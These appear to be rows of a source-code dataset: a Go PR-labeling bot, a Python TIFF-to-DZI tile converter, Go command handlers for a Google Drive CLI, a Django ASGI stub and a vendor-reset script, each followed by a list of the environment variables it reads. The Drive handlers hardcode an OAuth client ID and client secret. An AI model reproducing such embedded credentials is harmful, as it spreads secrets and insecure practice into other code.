return "Title matches regex"
},
Evaluate: func(pr *gh.PullRequest, matcher LabelMatcher) (bool, error) {
if len(matcher.Title) <= 0 {
return false, fmt.Errorf("title is not set in config")
}
log.Printf("Matching `%s` against: `%s`", matcher.Title, pr.GetTitle())
isMatched, _ := regexp.Match(matcher.Title, []byte(pr.GetTitle()))
return isMatched, nil
},
}
}
func NewBranchCondition() Condition {
return Condition{
GetName: func() string {
return "Branch matches regex"
},
Evaluate: func(pr *gh.PullRequest, matcher LabelMatcher) (bool, error) {
if len(matcher.Branch) <= 0 {
return false, fmt.Errorf("branch is not set in config")
}
prBranchName := pr.Head.GetRef()
log.Printf("Matching `%s` against: `%s`", matcher.Branch, prBranchName)
isMatched, _ := regexp.Match(matcher.Branch, []byte(prBranchName))
return isMatched, nil
},
}
}
func NewFilesCondition() Condition {
prFiles := []string{}
return Condition{
GetName: func() string {
return "File matches regex"
},
Evaluate: func(pr *gh.PullRequest, matcher LabelMatcher) (bool, error) {
if len(matcher.Files) <= 0 {
return false, fmt.Errorf("Files are not set in config")
}
if len(prFiles) == 0 {
var err error
prFiles, err = getPrFileNames(pr)
if err != nil {
return false, err
}
}
log.Printf("Matching `%s` against: %s", strings.Join(matcher.Files, ", "), strings.Join(prFiles, ", "))
for _, fileMatcher := range matcher.Files {
for _, prFile := range prFiles {
isMatched, _ := regexp.Match(fileMatcher, []byte(prFile))
if isMatched {
log.Printf("Matched `%s` against: `%s`", prFile, fileMatcher)
return isMatched, nil
}
}
}
return false, nil
},
}
}
func NewIsMergeableCondition() Condition {
return Condition{
GetName: func() string {
return "Pull Request is mergeable"
},
Evaluate: func(pr *gh.PullRequest, matcher LabelMatcher) (bool, error) {
b, err := strconv.ParseBool(matcher.Mergeable)
if err != nil {
return false, fmt.Errorf("mergeable is not set in config")
}
if b {
return pr.GetMergeable(), nil
}
return !pr.GetMergeable(), nil
},
}
}
func NewSizeCondition() Condition {
return Condition{
GetName: func() string {
return "Pull Request contains a number of changes"
},
Evaluate: func(pr *gh.PullRequest, matcher LabelMatcher) (bool, error) {
if len(matcher.SizeBelow) == 0 && len(matcher.SizeAbove) == 0 {
return false, fmt.Errorf("size-above and size-below are not set in config")
}
upperBound, err := strconv.ParseInt(matcher.SizeBelow, 0, 64)
if err != nil {
upperBound = math.MaxInt64
log.Printf("Upper boundary set to %d (config has invalid or empty value)", upperBound)
}
lowerBound, err := strconv.ParseInt(matcher.SizeAbove, 0, 32)
if err != nil || lowerBound < 0 {
lowerBound = 0
log.Printf("Lower boundary set to 0 (config has invalid or empty value)")
}
totalChanges := int64(math.Abs(float64(pr.GetAdditions() + pr.GetDeletions())))
log.Printf("Matching %d changes in PR against bounds: (%d, %d)", totalChanges, lowerBound, upperBound)
isWithinBounds := totalChanges > lowerBound && totalChanges < upperBound
return isWithinBounds, nil
},
}
}
// HandleEvent takes a GitHub Event and its raw payload (see link below)
// to trigger an update to the issue / PR's labels.
//
// https://developer.github.com/v3/activity/events/types/
func (l *Labeler) HandleEvent(
eventName string,
payload *[]byte) error {
event, err := gh.ParseWebHook(eventName, *payload)
if err != nil {
return err
}
switch event := event.(type) {
case *gh.PullRequestEvent:
err = l.executeOn(event.PullRequest)
}
return err
}
func (l *Labeler) executeOn(pr *gh.PullRequest) error {
owner := pr.Base.Repo.GetOwner().GetLogin()
repoName := *pr.Base.Repo.Name
config, err := l.FetchRepoConfig(owner, repoName)
labelUpdates, err := l.findMatches(pr, config)
if err != nil {
return err
}
currLabels, err := l.GetCurrentLabels(owner, repoName, *pr.Number)
if err != nil {
return err
}
// intentions(label) tells whether `label` should be set in the PR
intentions := map[string]bool{}
// initialize with current labels
for _, label := range currLabels {
intentions[label] = true
}
// update, adding new ones and unflagging those to remove
for label, isDesired := range labelUpdates.set {
intentions[label] = isDesired
}
// filter out only labels that must be set
desiredLabels := []string{}
for k, v := range intentions {
if v {
desiredLabels = append(desiredLabels, k)
}
}
log.Printf("Desired labels: %s", desiredLabels)
return l.ReplaceLabelsForPr(owner, repoName, *pr.Number, desiredLabels)
}
// findMatches returns all updates to be made to labels for the given PR
func (l *Labeler) findMatches(pr *gh.PullRequest, config *LabelerConfig) (LabelUpdates, error) {
labelUpdates := LabelUpdates{
set: map[string]bool{},
}
conditions := []Condition{
NewTitleCondition(),
NewBranchCondition(),
NewIsMergeableCondition(),
NewSizeCondition(),
NewFilesCondition(),
}
for label, matcher := range *config {
for _, c := range conditions {
isMatched, err := c.Evaluate(pr, matcher)
if err != nil {
log.Printf("%s: condition %s skipped (%s)", label, c.GetName(), err)
continue
}
prev, ok := labelUpdates.set[label]
if ok { // Other conditions were evaluated for the label
labelUpdates.set[label] = prev && isMatched
} else { // First condition evaluated for this label
labelUpdates.set[label] = isMatched
}
log.Printf("%s: condition %s yields %t", label, c.GetName(), isMatched)
if isMatched {
continue
}
}
}
return labelUpdates, nil
}
// getPrFileNames returns all of the file names (old and new) of files changed in the given PR
func getPrFileNames(pr *gh.PullRequest) ([]string, error) {
ghToken := os.Getenv("GITHUB_TOKEN")
diffReq, err := http.NewRequest("GET", pr.GetDiffURL(), nil)
if err != nil {
return nil, err
}
diffReq.Header.Add("Authorization", "Bearer "+ghToken)
diffRes, err := http.DefaultClient.Do(diffReq)
if err != nil {
return nil, err
}
defer diffRes.Body.Close()
var diffRaw []byte
prFiles := make([]string, 0)
if diffRes.StatusCode == http.StatusOK {
diffRaw, err = ioutil.ReadAll(diffRes.Body)
if err != nil {
return nil, err
}
diff, _ := diffparser.Parse(string(diffRaw))
prFilesSet := map[string]struct{}{}
// Place in a set to remove duplicates
for _, file := range diff.Files {
prFilesSet[file.OrigName] = struct{}{}
prFilesSet[file.NewName] = struct{}{}
}
// Convert to list to make it easier to consume
for k := range prFilesSet {
prFiles = append(prFiles, k)
}
}
return prFiles, nil
}
|
[
"\"GITHUB_TOKEN\""
] |
[] |
[
"GITHUB_TOKEN"
] |
[]
|
["GITHUB_TOKEN"]
|
go
| 1 | 0 | |
pyramid/extract2dzi_rgb.py
|
#!/usr/bin/env python
import sys
import os
import re
import numpy
from PIL import Image
import StringIO
# you need to install this library yourself
# recent versions handle bigtiff too...
import tifffile
"""
Extract pyramidal TIFF files with JPEG tiled storage into a tree of
separate JPEG files into DZI compliant directory that is usable
by openseadragon. Multiple channels info are combined into single
jpeg.
usage: extract2dzi_rgb.py pyramid-file-dir dest-dir
The pyramid-file must be a multi-page TIFF with each page having an
image scaled by 1/2 from the previous page. All pages must be tiled
with the same tile size, and tiles must be stored using the new-style
JPEG compression format, i.e. TIFF compression == 7.
The lowest resolution page must have 4 or fewer tiles. If it has
more than 1, this script will leave space for the user to decide whether
final lowest zoom tile 0/0_0.jpg that is 1/2 scaled version of the image
represented by that last page should be generated or not.
File directory generated
dest-dir
ImageProperties.xml
0
0_0.jpg
1
0_0.jpg
1_0.jpg
...
Since the tiled tiff kept padded tiles and openseadragon expected its
jpeg files to be cropped but not padded, the border tiles are cropped
and the width and height of image uses the actual image dimension
"""
try:
srcloc = sys.argv[1]
outloc = sys.argv[2]
if not os.path.exists(srcloc) or not os.path.isdir(srcloc):
sys.stderr.write('Pyramid directory must be given and exist')
sys.stderr.write('\nusage: extract2dzi_rgb.py pyramid-file-directory dest-dir\n\n')
sys.exit(1)
if not os.path.exists(outloc):
os.makedirs(outloc)
except:
sys.stderr.write('\nusage: extract2dzi_rgb.py pyramid-file-directory dest-dir\n\n')
raise
## 20140403-R26-Tdt-JJG-0-38-000-DAPI-Z3.tif
## 20140403-R26-Tdt-JJG-0-38-000-FITC-Z3.tif
## 20140403-R26-Tdt-JJG-0-38-000-Rhodamine-Z3.tif
## iterate through the files,
## if valid tiff file, then change the outdir to
## outdir/DAPI/.xml,0,1..
## essentialy like calling extract2dzi.py filename outdir/color
infile=None
txsize=0
tysize=0
pxsize=0
pysize=0
zoomno=0
outinfo=[]
total_tiles=0
topdir_template = '%(outdir)s'
dir_template = topdir_template +'/%(zoomno)d'
tile_template = dir_template + '/%(tcolno)d_%(trowno)d.jpg'
image_template = '%(outdir)s/ImageProperties.xml'
################# helper functions ###################
# http://www.w3.org/Graphics/JPEG/jfif3.pdf
def jpeg_assemble(jpeg_tables_bytes, jpeg_bytes):
return jpeg_bytes[0:2] + jpeg_tables_bytes + jpeg_bytes[2:]
def load_tile(infile, tile_offset, tile_length):
infile.seek(tile_offset)
return infile.read(tile_length)
def getTile(page, infile, jpeg_tables_bytes, tileno):
jpeg = jpeg_assemble(jpeg_tables_bytes, load_tile(infile, page.tags.tile_offsets.value[tileno], page.tags.tile_byte_counts.value[tileno]))
outfile = StringIO.StringIO()
outfile.write( jpeg )
outfile.seek(0)
image = Image.open(outfile)
ret = numpy.asarray(image)
outfile.close()
return ret
def maxTile(page, infile):
pxsize, pysize, txsize, tysize, tcols, trows, jpeg_tables_bytes = get_page_info(page)
maxval = 0
for tileno in range(0, len(page.tags.tile_offsets.value)):
tile = getTile(page, infile, jpeg_tables_bytes, tileno)
maxval = max(maxval, tile.max())
return maxval
def write_tile(tileno, trow, trows, tcol, tcols, rgb_image):
"""Output one tile. Note this manages global state for tile grouping in subdirs."""
global zoomno
global total_tiles
cropIt = False
if (trow+1 == trows) or (tcol+1 == tcols) :
#this is a border tile, crop it if need to
if tcol+1 == tcols :
cpxsize= (pxsize-(txsize * tcol))
else:
cpxsize=txsize
if trow+1 == trows :
cpysize= (pysize-(tysize * trow))
else:
cpysize=tysize
cropIt = True
total_tiles += 1
topdir = topdir_template % dict(
outdir = outloc
)
if not os.path.exists(topdir):
os.makedirs(topdir, mode=0755)
dirname = dir_template % dict(
outdir = outloc,
zoomno = zoomno
)
if not os.path.exists(dirname):
# create tile group dir on demand
os.makedirs(dirname, mode=0755)
outname = tile_template % dict(
outdir = outloc,
zoomno = zoomno,
tcolno = tcol,
trowno = trow
)
if cropIt :
rgb_image = rgb_image.crop((0,0, cpxsize, cpysize))
rgb_image.save(outname, 'JPEG')
return outname
def get_page_info(page):
pxsize = page.tags.image_width.value
pysize = page.tags.image_length.value
# get common JPEG tables to insert into all tiles
# ffd8 ffdb .... ffd9
if hasattr(page.tags, 'jpeg_tables'):
# trim off start-image/end-image byte markers at prefix and suffix
jpeg_tables_bytes = bytes(bytearray(page.tags.jpeg_tables.value))[2:-2]
else:
# no common tables to insert?
jpeg_tables_bytes = bytes(bytearray([]))
# this page has multiple JPEG tiles
txsize = page.tags.tile_width.value
tysize = page.tags.tile_length.value
tcols = pxsize / txsize + (pxsize % txsize > 0)
trows = pysize / tysize + (pysize % tysize > 0)
return pxsize, pysize, txsize, tysize, tcols, trows, jpeg_tables_bytes
def processTiff() :
global infile
global txsize
global tysize
global pxsize
global pysize
global zoomno
global total_tiles
# fname=tiff_files[0];
# chop=re.search('(?:[-][^-]*[-]Z[0-9]).tif', fname);
# t=chop.group(0)
for file in range(0, len(tiff_files)):
tiff = tifffile.TiffFile(srcloc+'/'+tiff_files[file])
tiff_tifffile.append(tiff)
pages = list(tiff)
pages.reverse()
outpages = [ page for page in pages if hasattr(page.tags, 'tile_offsets') ]
if type(outpages[0].tags.tile_offsets.value) is int:
outpages[0].tags.tile_offsets.value=[outpages[0].tags.tile_offsets.value]
outpages[0].tags.tile_byte_counts.value=[outpages[0].tags.tile_byte_counts.value]
tiff_outpages.append(outpages)
infile = open(srcloc+'/'+tiff_files[file], 'rb')
tiff_infile.append(infile)
# skip pages that aren't tiled... thumbnails?!
# outpages = tiff_outpages[0]
zoomno = 0
lowest_level = 0
total_tiles = 0
# remember values for debugging sanity checks
prev_page = None
tile_width = None
tile_length = None
reduce_ratio = 2 # default
###############CODE############
for channelno in range(0, len(tiff_outpages)):
tiff_maxval.append([])
for pageno in range(0, len(tiff_outpages[0])):
tiff_maxval[channelno].append(max(0, maxTile(tiff_outpages[channelno][pageno], tiff_infile[channelno])))
for pageno in range(0, len(tiff_outpages[0])):
page = tiff_outpages[0][pageno]
# panic if these change from reverse-engineered samples
assert page.tags.fill_order.value == 1
assert page.tags.orientation.value == 1
assert page.tags.compression.value == 7 # new-style JPEG
if prev_page is not None:
reduce_ratio=page.tags.image_width.value / prev_page.tags.image_width.value
tiff_page_info = []
for channelno in range(0, len(tiff_outpages)):
tiff_page_info.append(tiff_outpages[channelno][pageno])
for tileno in range(0, len(page.tags.tile_offsets.value)):
tile_array = []
for channelno in range(0, len(tiff_outpages)):
tiffPage = tiff_outpages[channelno][pageno]
pxsize, pysize, txsize, tysize, tcols, trows, jpeg_tables_bytes = get_page_info(tiffPage)
# figure position of tile within tile array
trow = tileno / tcols
tcol = tileno % tcols
assert trow >= 0 and trow < trows
assert tcol >= 0 and tcol < tcols
if tile_width is not None:
assert tile_width == txsize
assert tile_length == tysize
else:
tile_width = txsize
tile_length = tysize
tile = getTile(tiffPage, tiff_infile[channelno], jpeg_tables_bytes, tileno)
tile_norm = (255 * (tile.astype('float') / tiff_maxval[channelno][pageno])).astype('uint8')
tile_array.append(tile_norm)
rgb_array = numpy.dstack( tuple(tile_array) )
rgb_image = Image.fromarray(rgb_array)
write_tile(tileno, trow, trows, tcol, tcols, rgb_image)
outinfo.append(
dict(
tile_width= txsize,
tile_length= tysize,
image_width_orig= pxsize,
image_length_orig= pysize,
image_width_padded= tcols * txsize,
image_length_padded= trows * tysize,
image_level = zoomno,
total_tile_count= total_tiles,
color_type = 'combo',
level_scale=reduce_ratio
)
)
# each page is next higher zoom level
zoomno += 1
prev_page = page
for infile in tiff_infile:
infile.close()
imageinfo=outinfo[-1]
imageinfo['image_lowest_level']=lowest_level
imageinfo['data_location']=outloc;
image_descriptor = """\
<?xml version="1.0" encoding="UTF-8"?>
<IMAGE_PROPERTIES
width="%(image_width_orig)d"
height="%(image_length_orig)d"
numTiles="%(total_tile_count)d"
numImages="1"
version="2.0"
meterScaleInPixels="402738.62263391056"
tileWidth="%(tile_width)d"
tileHeight="%(tile_length)d"
levelScale="%(level_scale)d"
channelName="%(color_type)s"
minLevel="%(image_lowest_level)d"
maxLevel="%(image_level)d"
data="%(data_location)s"
/>
""" % imageinfo
iname= image_template % dict(outdir = outloc)
f = open('%s' % iname, 'w')
f.write(image_descriptor)
f.close
###############################################
tiff_files = []
tiff_outpages = []
tiff_tifffile = []
tiff_infile = []
tiff_maxval = []
redColors = ['Rhodamine', 'RFP', 'Alexa Fluor 555', 'Alexa Fluor 594', 'tdTomato', 'Alexa Fluor 633', 'Alexa Fluor 647']
greenColors = ['FITC', 'Alexa 488', 'EGFP', 'Alexa Fluor 488']
blueColors = ['DAPI']
tiff_colors = {'reds': redColors, 'greens': greenColors, 'blues': blueColors}
def getFileColors(file):
colorMatched = None
for colors in tiff_colors:
for color in tiff_colors[colors]:
if re.match('.*[-]%s([-]Z[0-9]+)*[.]tif' % color, file):
colorMatched = True
return colors
if not colorMatched:
sys.stderr.write('Unknown color for file "%s" \n' % file)
sys.exit(1)
def getFileColor(file):
colorMatched = None
for colors in tiff_colors:
for color in tiff_colors[colors]:
if re.match('.*[-]%s([-]Z[0-9]+)*[.]tif' % color, file):
colorMatched = True
return color
if not colorMatched:
sys.stderr.write('Unknown color for file "%s" \n' % file)
sys.exit(1)
def checkFileColors(files):
for file in files:
colorMatched = None
for colors in tiff_colors:
for color in tiff_colors[colors]:
if re.match('.*[-]%s([-]Z1)*[.]tif' % color, file):
colorMatched = True
break
if colorMatched:
break
if not colorMatched:
sys.stderr.write('000Unknown color for file "%s" \n' % file)
sys.exit(1)
def colorFile(files, colors, pattern):
tifFiles = []
for color in colors:
colorFiles = [ f for f in files if re.match('.*[-]%s%s' % (color, pattern), f) ]
if len(colorFiles) == 1:
tifFiles.append(colorFiles[0])
if len(tifFiles) > 0:
return tifFiles
else:
return None
def getTiffFiles(dname):
global tiff_files
files = os.listdir(dname)
z1 = [f for f in files if re.match('.*[-]Z1[.]tif', f)]
if len(z1) > 0:
checkFileColors(z1)
stacks = len(files) / len(z1)
stackNo = stacks / 2
if stackNo * 2 < stacks:
stackNo += 1
stackPattern = '[-]Z%d[.]tif' % stackNo
else:
stackPattern = '[.]tif'
for colors in tiff_colors:
colorFiles = colorFile(files, colors, stackPattern)
if colorFiles:
for file in colorFiles:
tiff_files.append(file)
if len(tiff_files) == 0:
files = [ '%s' % (f) for f in files if re.match('.*%s' % stackPattern, f) ]
## need to reorder it into RGB order.
red_one=0
blue_one=0
green_one=0
for f in files:
c=getFileColors(f)
if c == 'reds':
red_one=f
if c == 'blues':
blue_one=f
if c == 'greens':
green_one=f
tiff_files = [red_one, green_one, blue_one ]
# print "red is "+red_one
# print "blue is "+blue_one
# print "green is "+green_one
####### Main body ######
try:
getTiffFiles(srcloc)
except SystemExit:
raise
if len(tiff_files) == 0:
print 'Nothing to do'
sys.exit()
if not os.path.exists(outloc):
os.makedirs(outloc)
processTiff()
|
[] |
[] |
[] |
[]
|
[]
|
python
| null | null | null |
handlers_drive.go
|
package main
import (
"fmt"
"golang.org/x/net/context"
"golang.org/x/oauth2"
"io"
"io/ioutil"
"net/http"
"os"
"path/filepath"
"time"
"github.com/RyuujiX/gdrive/auth"
"github.com/RyuujiX/gdrive/cli"
"github.com/RyuujiX/gdrive/drive"
)
const ClientId = "599812208586-nlhdfs4jubm6i2f6jel3sangh78haoat.apps.googleusercontent.com"
const ClientSecret = "VmHD_Kmxcdv7wFqCikvG5ddY"
const TokenFilename = "token_v2.json"
const DefaultCacheFileName = "file_cache.json"
func listHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).List(drive.ListFilesArgs{
Out: os.Stdout,
MaxFiles: args.Int64("maxFiles"),
NameWidth: args.Int64("nameWidth"),
Query: args.String("query"),
SortOrder: args.String("sortOrder"),
SkipHeader: args.Bool("skipHeader"),
SizeInBytes: args.Bool("sizeInBytes"),
AbsPath: args.Bool("absPath"),
})
checkErr(err)
}
func listChangesHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).ListChanges(drive.ListChangesArgs{
Out: os.Stdout,
PageToken: args.String("pageToken"),
MaxChanges: args.Int64("maxChanges"),
Now: args.Bool("now"),
NameWidth: args.Int64("nameWidth"),
SkipHeader: args.Bool("skipHeader"),
})
checkErr(err)
}
func downloadHandler(ctx cli.Context) {
args := ctx.Args()
checkDownloadArgs(args)
err := newDrive(args).Download(drive.DownloadArgs{
Out: os.Stdout,
Id: args.String("fileId"),
Force: args.Bool("force"),
Skip: args.Bool("skip"),
Path: args.String("path"),
Delete: args.Bool("delete"),
Recursive: args.Bool("recursive"),
Stdout: args.Bool("stdout"),
Progress: progressWriter(args.Bool("noProgress")),
Timeout: durationInSeconds(args.Int64("timeout")),
})
checkErr(err)
}
func downloadQueryHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).DownloadQuery(drive.DownloadQueryArgs{
Out: os.Stdout,
Query: args.String("query"),
Force: args.Bool("force"),
Skip: args.Bool("skip"),
Recursive: args.Bool("recursive"),
Path: args.String("path"),
Progress: progressWriter(args.Bool("noProgress")),
})
checkErr(err)
}
func downloadSyncHandler(ctx cli.Context) {
args := ctx.Args()
cachePath := filepath.Join(args.String("configDir"), DefaultCacheFileName)
err := newDrive(args).DownloadSync(drive.DownloadSyncArgs{
Out: os.Stdout,
Progress: progressWriter(args.Bool("noProgress")),
Path: args.String("path"),
RootId: args.String("fileId"),
DryRun: args.Bool("dryRun"),
DeleteExtraneous: args.Bool("deleteExtraneous"),
Timeout: durationInSeconds(args.Int64("timeout")),
Resolution: conflictResolution(args),
Comparer: NewCachedMd5Comparer(cachePath),
})
checkErr(err)
}
func downloadRevisionHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).DownloadRevision(drive.DownloadRevisionArgs{
Out: os.Stdout,
FileId: args.String("fileId"),
RevisionId: args.String("revId"),
Force: args.Bool("force"),
Stdout: args.Bool("stdout"),
Path: args.String("path"),
Progress: progressWriter(args.Bool("noProgress")),
Timeout: durationInSeconds(args.Int64("timeout")),
})
checkErr(err)
}
func uploadHandler(ctx cli.Context) {
args := ctx.Args()
checkUploadArgs(args)
err := newDrive(args).Upload(drive.UploadArgs{
Out: os.Stdout,
Progress: progressWriter(args.Bool("noProgress")),
Path: args.String("path"),
Name: args.String("name"),
Description: args.String("description"),
Parents: args.StringSlice("parent"),
Mime: args.String("mime"),
Recursive: args.Bool("recursive"),
Share: args.Bool("share"),
Delete: args.Bool("delete"),
ChunkSize: args.Int64("chunksize"),
Timeout: durationInSeconds(args.Int64("timeout")),
})
checkErr(err)
}
func uploadStdinHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).UploadStream(drive.UploadStreamArgs{
Out: os.Stdout,
In: os.Stdin,
Name: args.String("name"),
Description: args.String("description"),
Parents: args.StringSlice("parent"),
Mime: args.String("mime"),
Share: args.Bool("share"),
ChunkSize: args.Int64("chunksize"),
Timeout: durationInSeconds(args.Int64("timeout")),
Progress: progressWriter(args.Bool("noProgress")),
})
checkErr(err)
}
func uploadSyncHandler(ctx cli.Context) {
args := ctx.Args()
cachePath := filepath.Join(args.String("configDir"), DefaultCacheFileName)
err := newDrive(args).UploadSync(drive.UploadSyncArgs{
Out: os.Stdout,
Progress: progressWriter(args.Bool("noProgress")),
Path: args.String("path"),
RootId: args.String("fileId"),
DryRun: args.Bool("dryRun"),
DeleteExtraneous: args.Bool("deleteExtraneous"),
ChunkSize: args.Int64("chunksize"),
Timeout: durationInSeconds(args.Int64("timeout")),
Resolution: conflictResolution(args),
Comparer: NewCachedMd5Comparer(cachePath),
})
checkErr(err)
}
func updateHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).Update(drive.UpdateArgs{
Out: os.Stdout,
Id: args.String("fileId"),
Path: args.String("path"),
Name: args.String("name"),
Description: args.String("description"),
Parents: args.StringSlice("parent"),
Mime: args.String("mime"),
Progress: progressWriter(args.Bool("noProgress")),
ChunkSize: args.Int64("chunksize"),
Timeout: durationInSeconds(args.Int64("timeout")),
})
checkErr(err)
}
func infoHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).Info(drive.FileInfoArgs{
Out: os.Stdout,
Id: args.String("fileId"),
SizeInBytes: args.Bool("sizeInBytes"),
})
checkErr(err)
}
func importHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).Import(drive.ImportArgs{
Mime: args.String("mime"),
Out: os.Stdout,
Path: args.String("path"),
Parents: args.StringSlice("parent"),
Progress: progressWriter(args.Bool("noProgress")),
})
checkErr(err)
}
func exportHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).Export(drive.ExportArgs{
Out: os.Stdout,
Id: args.String("fileId"),
Mime: args.String("mime"),
PrintMimes: args.Bool("printMimes"),
Force: args.Bool("force"),
})
checkErr(err)
}
func listRevisionsHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).ListRevisions(drive.ListRevisionsArgs{
Out: os.Stdout,
Id: args.String("fileId"),
NameWidth: args.Int64("nameWidth"),
SizeInBytes: args.Bool("sizeInBytes"),
SkipHeader: args.Bool("skipHeader"),
})
checkErr(err)
}
func mkdirHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).Mkdir(drive.MkdirArgs{
Out: os.Stdout,
Name: args.String("name"),
Description: args.String("description"),
Parents: args.StringSlice("parent"),
})
checkErr(err)
}
func shareHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).Share(drive.ShareArgs{
Out: os.Stdout,
FileId: args.String("fileId"),
Role: args.String("role"),
Type: args.String("type"),
Email: args.String("email"),
Domain: args.String("domain"),
Discoverable: args.Bool("discoverable"),
})
checkErr(err)
}
func shareListHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).ListPermissions(drive.ListPermissionsArgs{
Out: os.Stdout,
FileId: args.String("fileId"),
})
checkErr(err)
}
func shareRevokeHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).RevokePermission(drive.RevokePermissionArgs{
Out: os.Stdout,
FileId: args.String("fileId"),
PermissionId: args.String("permissionId"),
})
checkErr(err)
}
func deleteHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).Delete(drive.DeleteArgs{
Out: os.Stdout,
Id: args.String("fileId"),
Recursive: args.Bool("recursive"),
})
checkErr(err)
}
func listSyncHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).ListSync(drive.ListSyncArgs{
Out: os.Stdout,
SkipHeader: args.Bool("skipHeader"),
})
checkErr(err)
}
func listRecursiveSyncHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).ListRecursiveSync(drive.ListRecursiveSyncArgs{
Out: os.Stdout,
RootId: args.String("fileId"),
SkipHeader: args.Bool("skipHeader"),
PathWidth: args.Int64("pathWidth"),
SizeInBytes: args.Bool("sizeInBytes"),
SortOrder: args.String("sortOrder"),
})
checkErr(err)
}
func deleteRevisionHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).DeleteRevision(drive.DeleteRevisionArgs{
Out: os.Stdout,
FileId: args.String("fileId"),
RevisionId: args.String("revId"),
})
checkErr(err)
}
func aboutHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).About(drive.AboutArgs{
Out: os.Stdout,
SizeInBytes: args.Bool("sizeInBytes"),
})
checkErr(err)
}
func aboutImportHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).AboutImport(drive.AboutImportArgs{
Out: os.Stdout,
})
checkErr(err)
}
func aboutExportHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).AboutExport(drive.AboutExportArgs{
Out: os.Stdout,
})
checkErr(err)
}
func getOauthClient(args cli.Arguments) (*http.Client, error) {
if args.String("refreshToken") != "" && args.String("accessToken") != "" {
ExitF("Access token not needed when refresh token is provided")
}
oauth_context := context.TODO()
if args.Bool("disable-compression") {
oauth_context = context.WithValue(oauth_context, oauth2.HTTPClient,
&http.Client{Transport: &http.Transport{DisableCompression: true}})
}
if args.String("refreshToken") != "" {
return auth.NewRefreshTokenClient(ClientId, ClientSecret, oauth_context, args.String("refreshToken")), nil
}
if args.String("accessToken") != "" {
return auth.NewAccessTokenClient(ClientId, ClientSecret, oauth_context, args.String("accessToken")), nil
}
configDir := getConfigDir(args)
if args.String("serviceAccount") != "" {
serviceAccountPath := ConfigFilePath(configDir, args.String("serviceAccount"))
serviceAccountClient, err := auth.NewServiceAccountClient(serviceAccountPath, oauth_context)
if err != nil {
return nil, err
}
return serviceAccountClient, nil
}
tokenPath := ConfigFilePath(configDir, TokenFilename)
return auth.NewFileSourceClient(ClientId, ClientSecret, oauth_context, tokenPath, authCodePrompt)
}
func getConfigDir(args cli.Arguments) string {
// Use dir from environment var if present
if os.Getenv("GDRIVE_CONFIG_DIR") != "" {
return os.Getenv("GDRIVE_CONFIG_DIR")
}
return args.String("configDir")
}
func newDrive(args cli.Arguments) *drive.Drive {
oauth, err := getOauthClient(args)
if err != nil {
ExitF("Failed getting oauth client: %s", err.Error())
}
client, err := drive.New(oauth)
if err != nil {
ExitF("Failed getting drive: %s", err.Error())
}
return client
}
func authCodePrompt(url string) func() string {
return func() string {
fmt.Println("Authentication needed")
fmt.Println("Go to the following url in your browser:")
fmt.Printf("%s\n\n", url)
fmt.Print("Enter verification code: ")
var code string
if _, err := fmt.Scan(&code); err != nil {
fmt.Printf("Failed reading code: %s", err.Error())
}
return code
}
}
func progressWriter(discard bool) io.Writer {
if discard {
return ioutil.Discard
}
return os.Stderr
}
func durationInSeconds(seconds int64) time.Duration {
return time.Second * time.Duration(seconds)
}
func conflictResolution(args cli.Arguments) drive.ConflictResolution {
keepLocal := args.Bool("keepLocal")
keepRemote := args.Bool("keepRemote")
keepLargest := args.Bool("keepLargest")
if (keepLocal && keepRemote) || (keepLocal && keepLargest) || (keepRemote && keepLargest) {
ExitF("Only one conflict resolution flag can be given")
}
if keepLocal {
return drive.KeepLocal
}
if keepRemote {
return drive.KeepRemote
}
if keepLargest {
return drive.KeepLargest
}
return drive.NoResolution
}
func checkUploadArgs(args cli.Arguments) {
if args.Bool("recursive") && args.Bool("delete") {
ExitF("--delete is not allowed for recursive uploads")
}
if args.Bool("recursive") && args.Bool("share") {
ExitF("--share is not allowed for recursive uploads")
}
}
func checkDownloadArgs(args cli.Arguments) {
if args.Bool("recursive") && args.Bool("delete") {
ExitF("--delete is not allowed for recursive downloads")
}
}
|
[
"\"GDRIVE_CONFIG_DIR\"",
"\"GDRIVE_CONFIG_DIR\""
] |
[] |
[
"GDRIVE_CONFIG_DIR"
] |
[]
|
["GDRIVE_CONFIG_DIR"]
|
go
| 1 | 0 | |
doctorweb/asgi.py
|
"""
ASGI config for doctorweb project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'doctorweb.settings')
application = get_asgi_application()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
scripts/reset_vendor.py
|
"""Script to update vendor dependencies"""
import os
def main():
"""Main function"""
gopath = os.environ["GOPATH"]
terraform_path = os.path.join(*[gopath, "src", "github.com", "willguibr",
"terraform-provider-zpa"])
os.chdir(terraform_path)
os.system("git reset HEAD")
os.system("git stash")
os.system("rm -rf vendor")
os.system("git checkout vendor")
if __name__ == "__main__":
main()
|
[] |
[] |
[
"GOPATH"
] |
[]
|
["GOPATH"]
|
python
| 1 | 0 | |
cmd/prometheus/config.go
|
// Copyright 2015 The Prometheus Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
